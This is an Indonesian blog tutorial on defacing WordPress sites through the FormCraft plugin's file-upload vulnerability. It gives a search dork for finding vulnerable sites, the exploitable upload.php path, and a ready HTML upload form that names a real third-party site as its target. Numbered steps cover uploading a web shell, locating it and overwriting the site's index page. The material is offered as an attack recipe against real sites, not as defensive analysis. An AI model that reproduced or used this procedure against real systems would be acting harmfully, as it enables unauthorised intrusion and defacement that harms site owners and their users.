Cara Deface Dengan Wordpress Plugins FormCraft

Author : UnknownTidak ada komentar

MalaikatTersakiti jumpa lagi dengan saya admin MT pada jum'at malam ini saya tidak akan banyak cerita saya akan langsung ke topik yang akan di bahas karena admin lagi kurang sehat langsung aja ke bawah.

Bahan :

  1. Shell cari sendiri
  2. CSRF
  3. Dork : inurl:/wp-content/plugins/formcraft
  4. Exploit : /wp-content/plugins/formcraft/sile-upload/server/php/upload.php
Script CSRF :
<form method="POST" action="http://buildfire.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Save dengan ekstensi .html
Berikut langkahnya :
1. Buka google.com lalu masukan dork diatas
2. Lalu pilih sitenya
3. Jika sudah memilih masukan exploitnya
4. Jika vuln maka tampilannya akan seperti ini
5. Lalu buka dengan notepad script CSRF yang anda simpan tadi
6. Copy dan paste sitenya
7. Save kembali dan buka CSRF dengan browser, lalu pilih dan upload shell anda
8. Jika sukses maka tampilan akan seperti ini
9. Setelah shell sukses di upload lalu tinggal kita buka shell yang telah kita upload tadi
Tempat akses shell :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/-namashell.php

*Note : Kadang shell juga berupa random. Ex : 154897dc834ecb---aleale.php 
Maka akses shellnya menjadi :
/localhos/wp-content/plugins/formcraft/sile-upload/server/php/file/154897dc834ecb---aleale.php 
Jika Shell sudah di pasang langsung aja debas index nya seperti di bawah ini.

Sekian Tutorialnya. Selamat belajar :)

Artikel Terkait

Posted On : Kamis, 22 Desember 2016Time : 06.22
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : My Blog | |
close
Banner iklan disini
> [Tutup]